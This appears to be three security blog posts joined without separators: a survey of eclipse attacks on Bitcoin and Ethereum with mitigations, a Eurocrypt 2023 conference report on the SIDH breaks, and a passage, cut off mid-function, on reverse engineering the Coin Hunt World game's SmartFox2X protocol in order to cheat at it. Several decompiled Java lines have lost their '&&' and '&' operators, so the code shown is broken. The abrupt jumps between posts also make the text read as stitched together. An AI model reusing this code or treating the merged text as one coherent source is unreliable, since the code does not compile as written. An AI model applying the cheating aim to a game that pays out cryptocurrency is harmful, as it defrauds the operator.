Studies of blockchain architectures often start with the consensus algorithms and implicitly assume that information flows perfectly through the underlying peer-to-peer network, and peer discovery is sound and fully decentralized. In practice this is not always the case. A few years ago, a team of researchers looked at the Bitcoin¹ and Ethereum² networks in two papers, and uncovered various sources of eclipse attacks. In an eclipse attack, the attacker targets a node and isolates it from the rest of the network’s honest nodes by monopolizing all of its connections, hence eclipsing the victim from the latest true state of the network. In this blog post, we will survey the overlooked design elements that open the network to eclipse attacks and discuss some defense-in-depth measures. NCC Group regularly assesses blockchain network implementations, and unfortunately continues to observe design patterns that can lead to eclipse attacks.

Eclipse attacks on peer-to-peer networks such as Distributed Hash Tables (DHT) have been studied since the mid-2000s, with updates to the routing table (equivalent of ADDR messages³ in Bitcoin) weaponized to poison honest nodes’ peer tables. The trustless, open, and minimally structured architecture of blockchain networks make them even more susceptible to cache-poisoning and eclipse attacks.

When eclipsed, a miner is isolated from the network and its work is no longer productive. This victim essentially works on top of an orphaned chain which has the following implications:

• Splitting the mining power shrinks the total mining power, and therefore, the attacker can have a higher share of the mining rewards. This facilitates 51%-mining-power attacks as well as selfish-mining attacks⁴.
• Competing views of the blockchain confuse merchants that query the victim miner to determine whether a transaction’s state is finalized, before they release the goods. This is akin to double-spending. Similarly, light clients that use the victim miner as an anchor will have a corrupted view of the chain which can be exploited in all sorts of ways.
• Competing views of the blockchain make smart contracts unreliable since they treat the blockchain’s state as permanent storage.

While the impact of eclipse attacks on proof-of-work networks is well-studied, eclipsing a miner/validator in a proof-of-stake system has remained largely unexplored to date. This is in spite of the fact that it could result in financial loss for the victim and could slow down the consensus protocol.

It is worth emphasizing that the vulnerabilities described here have already been mitigated by the Bitcoin and Ethereum maintainers.

Mechanics of the Attack

The eclipse attacker aims to monopolize all of the victim node’s incoming, then eventually also outgoing connections. The attack’s steps will be different on various blockchains but they all have one element in common: they utilize the blockchain’s peer discovery algorithm to poison the victim’s peer table, wait for the victim node to restart (which any machine inevitably does), and flood it with attacker-controlled requests. Let’s first look at a vulnerable version of Bitcoin and then see how attacking Ethereum required even fewer resources.

Bitcoin Network

In case of Bitcoin, each node has a limited set of up to 8 outgoing connections and up to 117 incoming connections⁵. Nodes maintain two tables, namely tried and new tables, to monitor the state of their past and present peers. The tried table is partitioned into buckets which each store up to 64 unique peer IP addresses (with incoming or outgoing connections) along with their groups which is defined as /16 IPv4 prefix for the peers’ IP addresses. The index of the bucket for a given peer’s address is determined as a function of its random node identifier, its IP address and port number, and its group. The new table is populated by addresses that are received from the DNS seeders or ADDR messages; and as such their connectivity status is unknown.

The goal of the attacker is to isolate the node by continuously introducing it to controlled malicious nodes. Replacing addresses in the victim’s tried table requires establishing unsolicited incoming connections to the victim from nodes with various IP addresses. Once the attacker connects to the victim from an adversarial address, it can send (unsolicited) ADDR messages with 1000 trash addresses. The victim will naively add these addresses to its new table without testing their liveness. This elaborate scheme is made easier by the fact that nodes contact their peers for network information infrequently, even when they are under attack by the adversary.

The attack will progress once the node restarts and uses the addresses in the tried table (which are persisted on disk) to establish outgoing connections. Nodes may restart for various reasons, such as DoS attacks and ISP outages, or due to planned software updates. Security of a decentralized peer-to-peer network should not depend on 100% node uptime. Once the attacker controls all the victim’s outgoing connections, it shifts to monopolizing its incoming connections to fully isolate it. At that point the rest of the network assumes the victim was offline, and after 30 days, its peers will mark it as “terrible” and will forget it.

The success of this attack depends on the time invested and the number of adversarial IP addresses in a range of groups. The attacker can control the bandwidth cost of the attack by refusing to respond to requests (e.g., inventory request) that will require sending large payloads. The paper Stubborn Mining: Generalizing Selfish Mining and Combining with an Eclipse Attack argues that a group of miners might be incentivized to collude and eclipse a more powerful miner.

Ethereum Network

Ethereum’s peer discovery is more involved than Bitcoin; by default it has 13 outgoing connections and peer-to-peer messages are authenticated. In an attempt to design for a future when sharding would be supported to help scale the network, and also to ensure uniform network connectivity, Ethereum is modeled after Kademlia, which was originally invented for distributed file sharing on BitTorrent. The upshot was that the peer tables were public so nodes could be discovered with a bounded number of hops (logarithmic in the size of the network) and a biased distance measuring algorithm was used to order peers based on their identifier distance to the current node. Additionally, Ethereum node identifiers are simply their ECDSA public keys, allowing multiple nodes to be run on the same machine. This significantly lowers the cost of the attack to only 2 machines with 2 distinct IP addresses. Since nodes favor peers with lower identifier distance to their identifier, peer discovery is biased. The attacker generates an ECDSA key pair, calculates its corresponding node identifier and its distance to the victim’s node identifier, and finally gauges the probability that the victim includes it in its (public) peer table. The attacker repeats this procedure locally until it obtains a list of node identifiers that are most likely to be added to the victim’s peer tables.

The Geth Ethereum clients (prior to version v1.8.0) ran an eviction process every hour to ensure their peers are online and responsive. When a peer failed to respond after a predetermined number of times, it was evicted. So the attacker has to keep its nodes up for an extended period of time, until the victim is fully eclipsed.

In addition to these network attacks, the researchers observed that the UDP connections’ validity checks were highly sensitive to message timestamps. Nodes would reject packets with timestamps that differed more than 20 seconds from their clock. In real world applications, it should be assumed that a (motivated) attacker is able to manipulate a machine’s clock locally. It was shown that by skewing the victim’s clock, it would gradually isolate itself from the rest of the network, and consequently, the network would forget the node over time. Using nonces to track request and response messages, and calculating time differences locally is superior to trying to tolerate network delays with arbitrary limits.

Another takeaway is that when borrowing and adopting an algorithm (in this case using Kademlia with the plan to support sharding in the future), one has to pay close attention to its side-effects and whether they outweigh its initial costs. The Ethereum foundation has recently removed sharding from its roadmap and has replaced it with “DankSharding”⁶.

Recommended Remediations

The following recommendations are summarized from the two papers, cited in the reference section:

1. Favor peers with the longest history of successful connections rather than timestamp freshness.
2. Before evicting a seemingly older address from the table, attempt to connect to it and evict it only if the connection fails. This way the attacker will not be able to evict legitimate addresses. Success of this measure depends on the number of legitimate addresses before the attack begins.
3. Occasionally establish short-lived connections (aka feeler connections) with addresses in the new table and include them in the tried table if they are alive. This increases the chance of them being online when the node restarts. Evicting new addresses that are trash cleans up the new table.
4. Keep track of the timestamp of the first time a peer established connection and use two of the oldest peers as anchors when the node restarts (assuming they accept incoming connections).
5. Increase the size of tried and new tables, and periodically ensure that they are filled with legitimate and online addresses. For instance, by crawling the network to discover new peers.
6. Drop unsolicited (and large) ADDR messages from incoming connections to make filling the new table with trash addresses harder.
7. Ensure that the incoming connections are diverse, and a single or a few addresses cannot monopolize all the incoming connections.
8. Monitor the network and detect anomalies, e.g., a flurry of incoming large (mostly trash) ADDR messages or a drop in network’s mining power (i.e., increase in stale blocks). These can be used as a signal to act against a potential ongoing eclipse attack.
9. Make at least a minimum number of outgoing connections that did not originate from the unsolicited incoming connections. With this measure, an attacker would have a harder time monopolizing all of the victim’s connections.
10. Identify nodes by their public key in combination with another parameter, such as their IP address, to stop low-resource attackers who run multiple nodes on the same machine.
11. When there are no legitimate use cases for iterative lookups, do not publicize a node’s connection table. This would make it harder for an adversary to guess if a connection by their controlled node will be accepted by the victim.
12. Run seeding upon every reboot (even when the peer table is not empty) to discover fresh peers and avoid being isolated by an attacker. Try running the seeding procedure proactively to prevent the attacker from flooding the victim with incoming connections.

Conclusion

Since the adopted layer-one blockchain represents a base security layer for the add-on layers, it is imperative to design the underlying network protocols while having eclipse attacks in mind. This blog post aimed to bring more attention to this topic by summarizing some of the relevant research that has been conducted in the past decade. Following the above recommendations could greatly reduce the vulnerability of blockchains to eclipse attacks. However, It should be noted that these recommendations must be considered in combination with the given application’s threat model to avoid unintended consequences. Author refers the interested reader to the referenced papers for more details about the peer discovery algorithms and trust network formation in Bitcoin and Ethereum as the two dominant blockchains today.

The author would like to thank Gerald Doussot, Aleksandar Kircanski, Eli Sohl, and Paul Bottinelli of NCC Group’s Cryptography Services team for their review of this post. All mistakes remain with the author.

References

Last month I was lucky enough to attend Eurocrypt 2023, which took place in Lyon, France. It was my first chance to attend an academic cryptography conference and the experience sat somewhere in between the familiar cryptography of the Real World Crypto conference and the abstract world of black holes and supergravity conferences which I attended in my previous life as a theoretical physicist.

The Death of SIDH

My trip was motivated by the publication of the research paper A Direct Key Recovery Attack on SIDH, which I had worked on last summer with my coauthors Luciano Maino, Chloe Martindale, Lorenz Panny and Benjamin Wesolowski. The paper sits within the context of the attacks on the supersingular isogeny Diffie-Hellman (SIDH) protocol and thus the key-exchange mechanism SIKE, which is built on top of SIDH.

As a brief timeline, in July 2022 Wouter Castryck and Thomas Decru published a paper: An efficient key recovery attack on SIDH which gave a heuristic polynomial time algorithm to break all instances of SIKE within 24 hours using a theorem by Kani from 1997. Their attack used a higher dimensional isogeny between abelian surfaces as a passive oracle to determine Bob’s secret isogeny step-by-step in the isogeny graph. The efficiency of their attack exploited that SIKE had picked an elliptic curve with known endomorphism ring, which allowed them to efficiently compute auxiliary isogenies required for the attack.

One week later, Luciano Maino and Chloe Martindale published a paper: An attack on SIDH with arbitrary starting curve describing an independently derived attack on SIDH. Compared to the work of Castryck and Decru, they assumed no knowledge of the endomorphism ring of the curve, but the price to pay was that their attack had subexponential complexity. However, their work also contained a description of how you did not need to perform this chain of dimension-two isogenies to derive a secret, but rather only one successful oracle call was enough to completely derive the secret path. Following this paper, a third paper Breaking SIDH in polynomial time by Damien Robert showed that the attack of Maino and Martindale could be adapted to be provable polynomial time again by using dimension-eight isogenies between abelian varieties, where the auxiliary isogeny could always be computed.

For a high-level discussion of the Castryck-Decru attack on SIDH, Thomas Decru wrote a fantastic blog post and if you’re interested in how the attack is implemented, I wrote a fairly detailed blog post last year on the implementation of their attack using SageMath. My experience of this implementation is what led to the collaboration with Maino and Martindale, where together with Lorenz Panny we wrote a proof of concept implementation of their attack in SageMath.

The attacks on SIDH were not only beautiful pieces of cryptanalysis but were particularly important as only weeks before, SIKE had been chosen by NIST to continue to the fourth round of their post-quantum cryptography project. The huge impact of this work was acknowledged at this year’s Eurocrypt, where the Castryck-Decru attack won the best paper award and Robert’s and our work was given an honorable mention:

• An efficient key recovery attack on SIDH
  ★ Best Paper Award
  Wouter Castryck and Thomas Decru
• A Direct Key Recovery Attack on SIDH
  ★ Best Paper Honorable Mention
  Luciano Maino, Chloe Martindale, Lorenz Panny, Giacomo Pope and Benjamin Wesolowski
• Breaking SIDH in Polynomial Time
  ★ Best Paper Honorable Mention
  Damien Robert

These three papers were collected into a single plenary session on the second day of the conference and in turn, Thomas, Luciano and Damien took their 20 minutes to discuss their variant of the attacks and what this means for isogeny-based cryptography in the future. You can watch the session via YouTube.

Although the polynomial time break of SIDH is dramatic, the attack relies on the protocol sharing auxiliary data which many isogeny schemes never need. This means that although SIDH is broken, schemes such as CSIDH (another key exchange protocol) and SQISign (a digital signature algorithm) are unaffected by these attacks. In fact, when asked in the questions following their talks, all three authors expressed excitement of the new possibilities that these attacks offered and suggested that constructive applications of these techniques will open up isogeny-based cryptography to new and exciting protocols.

To continue the theme, isogenies also took first place on Tuesday night, when the The Superspecial Isogeny Club Quartet won the best rump session award with their song Kani came in like a wrecking ball.

Selected Talks

There were more than 100 papers published this year, and with the conference running with parallel tracks it was impossible to see every talk, let alone talk about them all here. However, there is time to mention a few talks which stood out to me during the week and I’m afraid that my post-quantum-bias shows up here!

Just how hard are rotations of Zⁿ? Algorithms and cryptography with the simplest lattice
Huck Bennett, Atul Ganju, Pura Peetathawatchai, Noah Stephens-Davidowitz [Presentation]

Imagine you draw the simplest lattice possible: the unit lattice. In two dimensions, this could be drawn by putting a dot on each corner of a square on a grid. In three dimensions it would mean drawing a dot for each vertex of a tiling of cubes. The intuitive basis to draw for these lattices is to take the unit vectors which take orthogonal steps in each direction. By taking these steps sequentially you can reach any dot in the lattice. This basis isn’t only nice, but it is the shortest basis we can draw.

Now, rather than being given this natural basis, imagine you’re given some ugly basis which has been found by first rotating the lattice and performing the same trick of finding vectors connecting dots by travelling directly upwards or sideways. The question is that when presented this long lattice basis, can you determine whether this is a lattice basis for the rotated simple lattice or just some random lattice? One way to answer this question is to determine if the basis describes the rotated unit lattice by finding the shortest basis and seeing if it is the orthogonal unit basis.

Surprisingly, this question seems to be difficult to answer. In fact, despite partial progress of finding efficient algorithms to solve this problem, this talk suggests that this is a cryptographically hard problem. From this, the authors build an encryption scheme based off the assumed hardness of this problem. I love cryptographic problems like this. The idea that you can take the simplest lattice we can construct and hide it almost completely with only a rotation is fascinating. I’m looking forward to seeing the progress / adoption on this problem. Either constructively from the hardness of this problem or cryptanalytically with a breakthrough on recovering the short orthogonal basis for this lattice problem.

Supersingular Curves You can Trust
Andrea Basso, Giulio Codogni, Deirdre Connolly, Luca De Feo, Tako Boris Fouotsa, Guido Maria Lido, Travis Morrison, Lorenz Panny, Sikhar Patranabis and Benjamin Wesolowski [Presentation]

In the isogeny world, a surprisingly hard problem to solve is how to find a way to “hash” to a supersingular elliptic curve. To understand this problem, let’s move over to the more familiar problem of hashing to points. For classical elliptic curve cryptography, there are times where a protocol requires the use of a point in a prime-order subgroup of the curve for which no one knows its relation to some fixed generator of the curve. This means we cannot compute the point as a scalar multiple of the generator but rather find a way to directly compute a point. This can de done efficiently and is discussed in the following IETF draft.

For isogeny-based cryptography, rather than ensuring no one knows a “scalar”, the important knowledge to hide is the endomorphism ring of the elliptic curve. At a high level, the endomorphism ring can be thought of as the collection of all of the isogenies which map from a curve to itself. Currently we have two methods of finding supersingular elliptic curves: compute a curve directly using the theory of complex multiplication or take a known supersingular curve and compute an isogeny to walk to some new curve.

The problem we have is that using complex multiplication to derive a curve necessarily also allows one to learn the endomorphism ring. For the isogeny walk, if you know the starting curve’s endomorphism ring and the isogeny connecting the curves, you also know the endomorphism ring of the final curve.

The authors of this work propose “SECUER: Supersingular Elliptic Curves with Unknown Endomorphism Ring”, a proposal of a trustless setup to “hash” to these curves. The idea is relatively simple. Although no one person can “hash” to a curve, if many people can work together, a curve with unknown endomorphism ring can be computed as long as one participant of the protocol is honest. The trick is to start with some curve and for the first user to randomly walk to a new curve. Although this user knows the endomorphism ring of their ending curve, if their isogeny is kept secret, then anyone given this curve cannot reasonably compute the endomorphism ring. By passing the end result of an isogeny to many users in a sequence, the final curve will have an endomorphism ring which could only be derived if every user has knowledge of every secret isogeny path taken.

Lattice Cryptography: What Happened and What’s Next
Vadim Lyubashevsky [Presentation]

The second invited speaker of Eurocrypt 2023 was Vadim Lyubashevsky of IBM, who gave a brilliant talk focusing on what has happened since Kyber and Dilithium were picked to be standardised by NIST after their selection in round three of the NIST post-quantum cryptography competition. For an overview of the selections, see NCC Group’s earlier blog post written by Thomas Pornin.

The talk discussed not only lattices and quantum-safe cryptography, but also served as a place to discuss the other complicated parts of the NIST competition and standardisation of protocols including patent issues, NIST/NSA conspiracy theories and the ongoing effort of migrating from our current cryptograph to something which is quantum-safe.

The latter half of the talk looked at future work and discussed progress on efficient zero-knowledge protocols using lattices. In particular, two projects which were mentioned were the new work on practical lattice-based zero knowledge proofs based on the hardness of Module-SIS and Module-LWE problems and new progress on practical anonymous credentials built from hard lattice problems.

Disorientation Faults in CSIDH
Gustavo Banegas, Juliane Krämer, Tanja Lange, Michael Meyer, Lorenz Panny, Krijn Reijnders, Jana Sotáková and Monika Trimoska [Presentation]

Although many of the talks at Eurocrypt were fantastically presented with engaging speakers and great cryptography, I think this talk is a principle example of how presentation slides can be used as a visual aide to demystify complex papers in such a way that an audience can really connect with a paper in the 20 minute slot the authors are given. I have included a link to the presentation for all these summarised talks, and really recommend watching this one.

The presentation described a fault attack on CSIDH, an isogeny-based key exchange protocol which is particularly interesting as it is both quantum-safe (although there are sub-exponential quantum attacks against the protocol) and is non-interactive. As with most isogeny-based protocols, the idea of CSIDH is that users Alice and Bob perform secret walks through an isogeny graph and send their end curves to each other. However, unlike SIDH which needed the deadly auxiliary data to allow the exchange to work, CSIDH is naturally commutative and Alice and Bob simply walk their path again from each other’s public curves to reach a shared secret curve.

When performing these walks, Alice and Bob both have a notion of “positive” and “negative” steps on their isogeny graphs. For the more mathematical, these directions are associated to walking from either a curve or its quadratic twist. Practically, random points are sampled and the code checks whether this will take the user in a positive or negative direction and keeps track of the remaining steps to take to finish the walk. The important part of this to understand is that for a single secret walk, the actual protocol requires taking many smaller walks in the isogeny graph in either these positive or negative directions.

By using a fault attack to trick the algorithm in taking positive steps when they should be negative (or vice-versa) the paper shows that information about the smaller sub-paths of the walk is leaked. By repeating fault attacks, an attacker can find information about each of these smaller walks making up the secret path. Given enough data, one can efficiently recover the secret walk by concatenating these smaller paths, breaking the protocol with an active side-channel.

An isogeny path to Zürich

Next year, Eurocrypt 2024 will be held in Zürich, Switzerland. With all the active research in isogeny-based cryptography, I’m excited to see where we are twelve months from now and with a little luck, hopefully I can enjoy Eurocrypt again next year with some new results of my own. For those who couldn’t attend this year, or just want to catch the sessions which collided with the ones they attended, IACR has uploaded all the talks to their YouTube channel.

Acknowledgements

Thanks to Paul Bottinelli of NCC Group for proof-reading an earlier draft of this post.

Introduction

We are going to walk through the process we took to reverse engineer parts of the Android game Coin Hunt World. Our goal was to identify methods and develop tooling to cheat at the game. Most of the post covers reverse engineering the game’s binary protocol and using that knowledge to create tooling for converting the binary protocol into something more human readable. With the ability to decode and replay packets from this protocol, we will then look into how we can cheat at the game. From this post you should get a sense of the process we took to reverse engineer the game and how to use that knowledge to develop tooling that will assist in understanding the game.

Game Overview

Coin Hunt World is an Android/iOS free-to-play and play-to-earn Geolocation game. The players walk around the real world searching for vaults to unlock. Once unlocked, the player will be asked a question from various categories such as mathematics, entertainment, etc. and if this question is answered correctly they will receive a small amount of cryptocurrency. Unlocking vaults requires keys, which can be obtained by unlocking vaults or completing daily walking challenges. To receive the cryptocurrency, you first must obtain 10,000 Resin to use for connecting Coin Hunt World with Uphold, a digital trading platform. After this has been done, your cryptocurrency will be automatically transferred to your Uphold account every Tuesday.

Lets walk through the normal game flow now, to visually demonstrate what the gameplay looks like. After creating an account, and logging into the game, you are presented as a player in this virtual world.

You can then move around this virtual world looking for vaults to unlock.

Once you find one, a key needs to be used to unlock the vault. At this point the game will let you choose a category and ask you a question related to that category.

If the question is answered correctly the user will receive a reward such as a small amount of cryptocurrency.

Each unlock of a Vault will consume a key but new keys can be earned by completing walking goals each day. There are various other aspects to the game but this describes the core functionality.

From a point of attacking the game, it would be interesting to somehow be able to directly modify the amount of cryptocurrency we have, spoof how much we have walked to earn keys, or to modify our location to open Vaults that we are not physically close to.

Intercepting Network Traffic

Before cheating at the game we first need to understand how it works, and most importantly how the game manages state, such as cryptocurrency or how much we have walked. Before doing any reverse engineering, we wanted to play the game to see how the various functionality works and what the network traffic looks like. To do this we routed our traffic through Burp, and started to use the application. We were kind of surprised at how little network traffic this was giving.

None of these requests appeared to contain details for tracking the state of the game. So it seemed likely that there was another channel for communication.

Wireshark

With no interesting traffic being sent to the proxy, there must be some other communication happening outside of our view currently. So we spun up Wireshark to get a better view of what was going on. This can be done by pushing an ARM version of tcpdump to the Android device, and executing (on MacOS):

adb shell 'su root -c /data/local/tmp/tcpdump -i wlan0 -w -" | /Applications/Wireshark.app/Contents/MacOS/Wireshark -k -i

From looking at the traffic, a few interesting things come up. There is unencrypted HTTP traffic on port 8000 and some unknown protocol being used over TCP on port 9933. The HTTP traffic is easy to intercept by setting up a rule in iptables to reroute it to our proxy.

iptables -t nat -A OUTPUT -p tcp -m tcp --dport 8000 -j REDIRECT --to-ports 3000

This gives a little bit more details but not what we are looking for. It seems like the HTTP traffic is just used to track the user with a POST request to /api/v1/user/tracking containing the longitude and latitude coordinate of the user.

Now lets investigate what is happening on port 9933.

Investigating port 9933

We started by looking at the captured traffic in Wireshark, looking for any patterns in the protocol to help understand it.

From comparing several different packets, we can start to understand the header to some extent. Most of the packets start with the byte 0x80 but some of them have 0xA0. In binary it would look like this:

0x80 – 1000 0000
0xA0 – 1010 0000

There is a noticeable difference between the traffic sent with a 0x80 and 0xA0 headers.

For the 0x80 header, ASCII encoded strings can be observed in the traffic and there are some patterns to how the data is structure but the 0xA0 traffic looks much more confusing and difficult to parse out any meaningful information. We can get an idea of whats happening by calculating the entropy of the traffic. This can easily be done with a free data analysis tool like CyberChef.

From this we can see that the data is very random, which clues us in that this is probably encrypted or compressed traffic. Taking a look at the binary representations of 0x80 and 0xA0 from before, we can make the assumption that the 6th bit of the header is used as a flag to send data in this way.

The meaning of the next two bytes were pretty easy to determine. For large packets this value would be high, and for small packets it would be low. From taking the value and counting out the bytes in a small packet, it ended up matching perfectly. So these 2 bytes are used for the length of the data being transmitted over this protocol.

Other than this, it was difficult for us to understand what the rest was doing. We will need to jump into the code to understand the rest of the protocol data.

Initial Binary Investigation

First we need to get the APK from the device. The location the APK is stored at can be determined with pm path <package_name>.

It turns out that the application is split between 3 APKs. So we will need to inspect each one to get an understanding of the application. Based on the APK names, it looks like we are dealing with a game built with the Unity framework. In order to reverse engineer it, we will need to understand how it works and use the appropriate tooling to get readable code. For a cursory look, we just ran apktool d apk_file.

This will extract the contents of the APK, decode the AndroidManifest.xml file and decode the classes.dex files into Smali code. Smali is the intermediate representation for the Dex format that is used by the Dalvik Virtual Machine (DVM), or more recently, the Android Run Time (ART). Usually, developers will write applications in Java which gets compiled and converted into Dex byte code. Decompiling the Dex byte code back to Java is more error prone and will likely not recompile correctly. Whereas decompiling to Smali will give a more exact representation, which can then be modified and compiled back into a working Dex file. Now lets take a look at the interesting things contained in each APK file.

base.apk

This file contains some assets, resources and the Smali code. The most important part is
the file located at base/assets/bin/Data/Managed/Metadata/global-metadata.dat. This file contains strings and function names, which are necessary for reversing the game. For more details on how this file is loaded and used, check out Katy’s blogpost at https://katyscode.wordpress.com/2020/12/27/il2cpp-part-2/. We would also recommend reading the other il2cpp posts on her site if you are interested in understanding these type of games better.

split_UnityDataAssetPack.apk

This APK pretty much just contains some assets. These assets will be useful for later.

split_config.arm64_v8a.apk

This APK contains all of the shared libraries (.so files). In here the most interesting to us is the libil2cpp.so file. This shared library will be used with the global-metadata.dat file to help with analysis.

Unity and IL2CPP

Unity games for Android can be distributed in 2 different ways. The standard way is it
that is is built with various .dll’s which can be decompiled back into C# code. The other way
is by using il2cpp. This essentially compiles the game to native code, which should
improve performance of the game. There are various tools that can help with analysis, but we will be using cpp2il. The advantage of this tool over others is that it gives pseudo-code for each of the functions. However, take the output with caution (at least for ARM binaries), since the pseudo-code is not always accurate. You can also use il2cppdumper to modify the disassembly in Ghidra to help with analysis.

There is just one issue to solve before running cpp2il. The tool accepts 1 APK as input, yet we have 3 APKs, each with different parts of the full application. To handle this, we just created a new APK and copied in all of the necessary components. The main things that cpp2il needs to run are the libil2cpp.so, global-metadata.dat and the Unity assets that are referenced. So we just copied all of the assets from base.apk and split_UnityDataAssetPack.apk into split_config.arm64_v8a.apk. This does not produce a runnable application but it gets an APK that can be analyzed properly by cpp2il. The output is various text files that contain pseudo-code. Here is an example of what some of the output looks like.

Looking for Network Communication

In order to connect over the network, the application must be making use of sockets. So we will use this as an entry point. We used ag to search through the previously decompiled pseudo-code for uses of Socket. The tool ag is pretty similar to grep but it is quite a bit faster and has better default printing. Results from running ag 'Socket('.

It seems that 2 libraries are making use of Sockets, those are System and SmartFox2X. Since System is included in all Unity games, it makes sense to start looking into what SmartFox2X is.

From searching SmartFox2X, we can find the website https://www.smartfoxserver.com/. To quote the website “SmartFoxServer is a comprehensive SDK for rapidly developing multiplayer games and applications”. From navigating the website, we can find a section about the SmartFoxServer 2X protocol.

It shows on this page that it has a default port of 9933, which matches our observations of the network from earlier. There are also some details about the types of data that can be transmitted using this protocol. The website has some details on what the protocol is used for but to be able to fully understand it, we will need to reverse the code. Luckily, they share the client libraries on their website. This will be a lot easier for reversing since the tooling for decompiling a JAR file is much better than for decompiling il2cpp code. The client library is written in other languages but we are most comfortable with reversing Java, so that is where we will begin.

Starting Point to Reverse

The first thing to be done is decompile the SmartFox2X client library. To do this we just used jadx. Luckily for us, the library still has all of the symbols, which will be very helpful for reverse engineering. The goal is to understand the protocol being used on port 9933. From looking at the class names, DefaultSFSDataSerializer seems like a good place to start since the protocol likely does some serialization that it sends out over the wire. This class contains a lot of interesting methods but decodeObject() seems to be a promising starting point since it takes a byte array as input. We’ll come back to describing this function later, but for now just know that it is used to parse objects such as integers, arrays, etc. from the byte array. We will first traverse up the call chain to reach a spot that reads the header of the data being transmitted then reverse engineer back toward the decodeObject() function and a few more relevant functions that it calls.

Finding the PacketHeader

From traversing up the call chain, we get to a function called onDataRead() in the class SFSIOHandler. This appears to be the code that handles the data for each packet sent over the network.

public void onDataRead(ByteArray data) throws SFSException {
    if (data.getLength() == 0) {
        throw new SFSException("Unexpected empty packet data: no readable bytes available!");
    }
    if (this.bitSwarm != null    this.isDebugMode) {
        if (data.getLength() > 1024) {
            this.log.info("Data Read: Size > 1024, dump omitted");
        } else {
            this.log.info("Data Read: " + ByteUtils.fullHexDump(data.getBytes()));
        }
    }
    data.setPosition(0);
    while (data.getLength() > 0) {
        if (getReadState() == 0) {
            data = handleNewPacket(data);
        } else if (getReadState() == 1) {
            data = handleDataSize(data);
        } else if (getReadState() == 2) {
            data = handleDataSizeFragment(data);
        } else if (getReadState() == 3) {
            data = handlePacketData(data);
        } else if (getReadState() == 4) {
            data = handleInvalidData(data);
        }
    }
}

To understand the flow, we must understand what getReadState() does. The getReadState() function returns the variable currentState from the FiniteStateMachine class. The SFSIOHandler class actually has an initialize function which initializes the state and transitions of the FiniteStateMachine.

private void InitStates() {
    this.fsm = new FiniteStateMachine();
    this.fsm.addState(4);
    this.fsm.addState(3);
    this.fsm.addState(1);
    this.fsm.addState(2);
    this.fsm.addState(0);
    this.fsm.addStateTransition(0, 1, 0);
    this.fsm.addStateTransition(1, 3, 1);
    this.fsm.addStateTransition(1, 2, 2);
    this.fsm.addStateTransition(2, 3, 3);
    this.fsm.addStateTransition(3, 0, 4);
    this.fsm.addStateTransition(3, 4, 5);
    this.fsm.addStateTransition(4, 0, 6);
    this.fsm.setCurrentState(0);
}

So there are 5 states (0,1,2,3 and 4) and 7 transitions between those states. So for example, applying transition 4 will cause the state to change from 3 to 0. The function getReadState() will get one of the 5 states and during the parsing of the data from the TCP packets, the state transitions will be applied to move through the states. The diagram below makes visualizing this flow a bit easier.

The parser is initialized with state 0. So when a new packet is received by the onDataRead() function, it will first call the handleNewPacket() function.

private ByteArray handleNewPacket(ByteArray data) throws SFSException {
    if (this.isDebugMode) {
        this.log.info("Handling New Packet of size " + data.getLength());
    }
    byte headerByte = data.readByte();
    if (((headerByte   128) ^ (-1)) > 0) {
        throw new SFSException("Unexpected header byte: " + ((int) headerByte) + "n" + DefaultObjectDumpFormatter.prettyPrintByteArray(data.getBytes()));
    }
    PacketHeader header = createPacketHeader(headerByte);
    this.pendingPacket = new PendingPacket(header);
    this.fsm.applyTransition(0);    // Applies transition 0 which changes state from 0 to 1
    return resizeByteArray(data, 1, data.getLength() - 1);
}

It first does an error check on the header then calls createPacketHeader(), which creates a PacketHeader object.

private PacketHeader createPacketHeader(byte headerByte) {
    return new PacketHeader(true, (headerByte   64) > 0, (headerByte   32) > 0, (headerByte   16) > 0, (headerByte   8) > 0);
}

This is essentially just checking if various bits are set in the header and passing them as a boolean values into the PacketHeader constructor. From there we can easily tell what each bit represents.

public PacketHeader(boolean binary, boolean encrypted, boolean compressed, boolean blueBoxed, boolean bigSized) {
    this.binary = binary;
    this.compressed = compressed;
    this.encrypted = encrypted;
    this.blueBoxed = blueBoxed;
    this.bigSized = bigSized;
}

From earlier, we had sniffed traffic for this protocol and saw both 0x80 and 0xA0 headers. These breakdown as follows:

0x80 = 1000 0000 – Binary flag is set which seems to always be the case
0xA0 = 1010 0000 – Binary and compression flags are set

At this point the PacketHeader object is incomplete since it does not contain the length of the data that will be received. Looking at the end of handleNewPacket(), we see that transition 0 is applied which causes a state change from 0 to 1. So on the next iteration of the while loop, handleDataSize() is called.

private ByteArray handleDataSize(ByteArray data) throws SFSException {
    ByteArray data2;
    if (this.isDebugMode    this.log.isDebugEnabled()) {
        this.log.debug("Handling Header Size. Length: " + data.getLength() + " (" + (this.pendingPacket.getHeader().isBigSized() ? "big" : "small") + ")");
    }
    int dataSize = -1;
    int sizeBytes = 2;
    if (this.pendingPacket.getHeader().isBigSized()) {
        if (data.getLength() >= 4) {
            dataSize = data.readInt();
        }
        sizeBytes = 4;
    } else if (data.getLength() >= 2) {
        dataSize = data.readUShort();
    }
    if (this.isDebugMode    this.log.isDebugEnabled()) {
        this.log.debug("Data size is " + dataSize);
    }
    if (dataSize != -1) {
        this.pendingPacket.getHeader().setExpectedLen(dataSize);
        data2 = resizeByteArray(data, sizeBytes, data.getLength() - sizeBytes);
        this.fsm.applyTransition(1);    // Move from state 1 to 3
    } else {
    // Handle fragmented packet
        this.fsm.applyTransition(2);    // Move from state 1 to 2
        writeBytes(this.pendingPacket, data);
        data2 = this.EMPTY_BUFFER;
    }
    return data2;
}

Based on the flag for bigSized, the code will read the length in as either an integer or a short and set the length for the PacketHeader object. If the dataSize of the packet is not -1, then the packet contains all of the data needed for the deserialization and will apply transition 1 to move to the handlePacketData() function. Otherwise, we are dealing with a fragmented packet and transition 2 will be applied to move to the function handleDataSizeFragment().

private ByteArray handleDataSizeFragment(ByteArray data) throws SFSException {
    ByteArray data2;
    if (this.isDebugMode    this.log.isDebugEnabled()) {
        this.log.debug("Handling Size fragment. Data: " + data.getLength());
    }
    int remaining = this.pendingPacket.getHeader().isBigSized() ? 4 - this.pendingPacket.getBuffer().getLength() : 2 - this.pendingPacket.getBuffer().getLength();
    if (data.getLength() >= remaining) {
        writeBytes(this.pendingPacket, data, remaining);
        int neededLength = this.pendingPacket.getHeader().isBigSized() ? 4 : 2;
        ByteArray size = new ByteArray();
        size.writeBytes(this.pendingPacket.getBuffer().getBytes(), neededLength);
        size.setPosition(0);
        int dataSize = this.pendingPacket.getHeader().isBigSized() ? size.readInt() : size.readShort();
        if (this.isDebugMode    this.log.isDebugEnabled()) {
            this.log.debug("DataSize is ready: " + dataSize + " bytes");
        }
